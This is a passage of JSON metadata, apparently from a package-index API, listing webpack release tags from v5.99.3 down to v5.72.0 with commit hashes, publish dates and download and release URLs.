99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosy